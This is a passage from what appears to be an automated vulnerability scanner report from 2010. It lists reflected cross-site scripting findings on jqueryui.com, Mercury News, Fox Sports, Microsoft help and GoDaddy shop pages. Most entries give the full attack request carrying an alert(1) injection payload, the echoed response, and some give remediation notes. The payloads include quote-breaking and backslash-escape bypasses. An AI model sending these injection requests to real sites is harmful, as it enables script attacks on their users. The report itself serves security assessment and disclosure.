GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px85bb8"><script>alert(1)</script>18668a6627e&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:11:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1431d"><script>alert(1)</script>4705b847df6 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=301431d"><script>alert(1)</script>4705b847df6&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:10:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f99f"><script>alert(1)</script>6d451900ce7 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=304f99f"><script>alert(1)</script>6d451900ce7&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:11:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb954"><script>alert(1)</script>367a87104dd was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxcb954"><script>alert(1)</script>367a87104dd&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:11:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
3.195. http://mercurynews.stats.com/fb/scoreboard.asp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://mercurynews.stats.com
Path:
/fb/scoreboard.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4e21"><script>alert(1)</script>284f253951f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fb/scoreboard.asp?e4e21"><script>alert(1)</script>284f253951f=1 HTTP/1.1 Host: mercurynews.stats.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html Cache-Control: private, max-age=10 Date: Mon, 15 Nov 2010 02:08:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 52877
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Sports - NFL - Scoreboards - San Jose Mercury News</title>
<div id="omniture" style="display:none;"> <!-- S ...[SNIP]... <META content="60;/fb/scoreboard.asp?e4e21"><script>alert(1)</script>284f253951f=1&meta=true" http-equiv="Refresh"> ...[SNIP]...
3.196. http://msn.foxsports.com/nfl/story/San-Francisco-49ers-notebook-Michael-Lewis-feeds-new-team-St-Louis-Rams-information-about-his-old-team-70614230 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9704c'-alert(1)-'518f21c5656 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/story/San-Francisco-49ers-notebook-Michael-Lewis-feeds-new-team-St-Louis-Rams-information-about-his-old-team-70614230?9704c'-alert(1)-'518f21c5656=1 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 234313 Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=AE79DE3284C33592F90AA3B7DC247CB6; Path=/ X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=27 Date: Sun, 14 Nov 2010 23:14:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the version request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 454b3\'%3balert(1)//851c49b677b was submitted in the version parameter. This input was echoed as 454b3\\';alert(1)//851c49b677b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /FSI/Page.aspx?advid=200177&loc=53824&fsi=14784&version=Mercury454b3\'%3balert(1)//851c49b677b HTTP/1.1 Host: newspaperads.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; s_cc=true; ZZFLSH=29; location=53824; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 15 Nov 2010 02:09:23 GMT Server: Microsoft-IIS/6.0 X-Server-Name: HW3 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 48110
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" x ...[SNIP]... newspaperads.mercurynews.com';
3.198. http://onlinehelp.microsoft.com/en-US/bing/ff808523.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://onlinehelp.microsoft.com
Path:
/en-US/bing/ff808523.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b9a"><script>alert(1)</script>a63a2a31e98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-US/bing/ff808523.aspx?f8b9a"><script>alert(1)</script>a63a2a31e98=1 HTTP/1.1 Host: onlinehelp.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: A=I&I=AxUFAAAAAABtBwAA4XNQCXpBTPk7cZerNYh7mA!!&M=1; domain=.microsoft.com; expires=Wed, 14-Nov-2040 23:14:04 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 14-Nov-2040 23:14:04 GMT; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:14:04 GMT Content-Length: 40552
3.199. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://onlinehelp.microsoft.com
Path:
/en-US/bing/ff808535.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6070d"><script>alert(1)</script>ad7ec223932 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-US/bing/ff808535.aspx?6070d"><script>alert(1)</script>ad7ec223932=1 HTTP/1.1 Host: onlinehelp.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: A=I&I=AxUFAAAAAAAFCgAAMPi17N5G3bmz8kqV4D9PUg!!&M=1; domain=.microsoft.com; expires=Wed, 14-Nov-2040 23:14:04 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 14-Nov-2040 23:14:04 GMT; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:14:03 GMT Content-Length: 43681
The value of the rFreeForm request parameter is copied into an HTML comment. The payload c15c0--><script>alert(1)</script>f18d1ae576c was submitted in the rFreeForm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /portlet/registration/html/info.jsp?rFreeForm=8101685c15c0--><script>alert(1)</script>f18d1ae576c HTTP/1.1 Host: secure.www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><script><!-- window.focus(); //--></script><link type="text/css" rel="stylesheet" href='https://secure.extras.mnginteractive.com/live/css/MNGiDefaultStyles.css'><script> function o ...[SNIP]... <!-- BEGIN FREEFORM RENDER, ID 8101685c15c0--><script>alert(1)</script>f18d1ae576c --> ...[SNIP]...
The value of the rPage request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6fb02</script><script>alert(1)</script>47f9d8515fe was submitted in the rPage parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /registration/?rPage=login6fb02</script><script>alert(1)</script>47f9d8515fe&url=http%3A%2F%2Fwww.mercurynews.com%2F&eRightsSessionExpired=true HTTP/1.1 Host: secure.www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 15 Nov 2010 02:09:38 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=0QISC2X0JL2UMCUUCBWCFFI; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - San Jose Mercury News</title><!-- get profile info -->< ...[SNIP]... rBrand = getBrand2(s_account); var PageName = "Registration"; var SectionName = "Registration"; var ArticleTitle = "null"; var FriendlyName = "Registration: login6fb02</script><script>alert(1)</script>47f9d8515fe"; var domainName = getDomainName(); userObj = new omniObj(); userObj.load(); userObj.update(); userObj.save(); /* You may give each page an identifying name, server, and cha ...[SNIP]...
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 586df"><script>alert(1)</script>cb76424f007 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /registration/?rPage=login&url=http%3A%2F%2Fwww.mercurynews.com%2F586df"><script>alert(1)</script>cb76424f007&eRightsSessionExpired=true HTTP/1.1 Host: secure.www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Mon, 15 Nov 2010 02:09:39 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=XBSY2AYHL45GQCUUCAWSFEY; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - San Jose Mercury News</title><!-- get profile info -->< ...[SNIP]... <a href="/registration?rPage=register&url=http://www.mercurynews.com/586df"><script>alert(1)</script>cb76424f007&register=yes"> ...[SNIP]...
The value of the rPage request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6715d</script><script>alert(1)</script>1b9e22d4bd9 was submitted in the rPage parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /registration/?rPage=login6715d</script><script>alert(1)</script>1b9e22d4bd9&url=http%3A%2F%2Fwww.siliconvalley.com%2F&eRightsSessionExpired=true HTTP/1.1 Host: secure.www.siliconvalley.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 15 Nov 2010 02:09:40 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=LX5GZDZ3HBPL0CUUCAXCFEY; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - SiliconValley.com</title><!-- get profile info --><!-- ...[SNIP]... rBrand = getBrand2(s_account); var PageName = "Registration"; var SectionName = "Registration"; var ArticleTitle = "null"; var FriendlyName = "Registration: login6715d</script><script>alert(1)</script>1b9e22d4bd9"; var domainName = getDomainName(); userObj = new omniObj(); userObj.load(); userObj.update(); userObj.save(); /* You may give each page an identifying name, server, and cha ...[SNIP]...
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13c8a"><script>alert(1)</script>4c191ca7cfb was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /registration/?rPage=login&url=http%3A%2F%2Fwww.siliconvalley.com%2F13c8a"><script>alert(1)</script>4c191ca7cfb&eRightsSessionExpired=true HTTP/1.1 Host: secure.www.siliconvalley.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Mon, 15 Nov 2010 02:09:41 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=4ISA2QSZCYI1ECUUCAXCFEY; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - SiliconValley.com</title><!-- get profile info --><!-- ...[SNIP]... <a href="/registration?rPage=register&url=http://www.siliconvalley.com/13c8a"><script>alert(1)</script>4c191ca7cfb&register=yes"> ...[SNIP]...
The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73226"%3balert(1)//8a48a0b359e was submitted in the isc parameter. This input was echoed as 73226";alert(1)//8a48a0b359e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Blankterrmall/BRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED/?isc=GPPT03A09273226"%3balert(1)//8a48a0b359e&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 177018 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=533i2z55uu1dxfvfftthjh55; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=BRAND+NEW+P90X+Extreme+Home+Fitness+13+DVD,%2fBlankterrmall%2fBRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED%2f?plv=false,1207793|; expires=Fri, 19-Nov-2010 23:17:37 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|BRAND+NEW+P90X+Extreme+Home+Fitness+13+DVD,%2fBlankterrmall%2fBRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED%2f?plv=false,1207793|; expires=Tue, 14-Dec-2010 23:17:38 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:17:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d886"style%3d"x%3aexpression(alert(1))"2c644fcb8ea was submitted in the isc parameter. This input was echoed as 1d886"style="x:expression(alert(1))"2c644fcb8ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Blankterrmall/BRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED/?isc=GPPT03A0921d886"style%3d"x%3aexpression(alert(1))"2c644fcb8ea&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 179107 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=m3otdjbtjn0j1jaaieauxc55; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=BRAND+NEW+P90X+Extreme+Home+Fitness+13+DVD,%2fBlankterrmall%2fBRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED%2f?plv=false,1207793|; expires=Fri, 19-Nov-2010 23:17:24 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|BRAND+NEW+P90X+Extreme+Home+Fitness+13+DVD,%2fBlankterrmall%2fBRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED%2f?plv=false,1207793|; expires=Tue, 14-Dec-2010 23:17:24 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:17:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e038"%3balert(1)//b62314b1d25 was submitted in the isc parameter. This input was echoed as 5e038";alert(1)//b62314b1d25 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /FOURTH-RIVER-OC-CORP/LIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS/?isc=GPPT02C0215e038"%3balert(1)//b62314b1d25&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
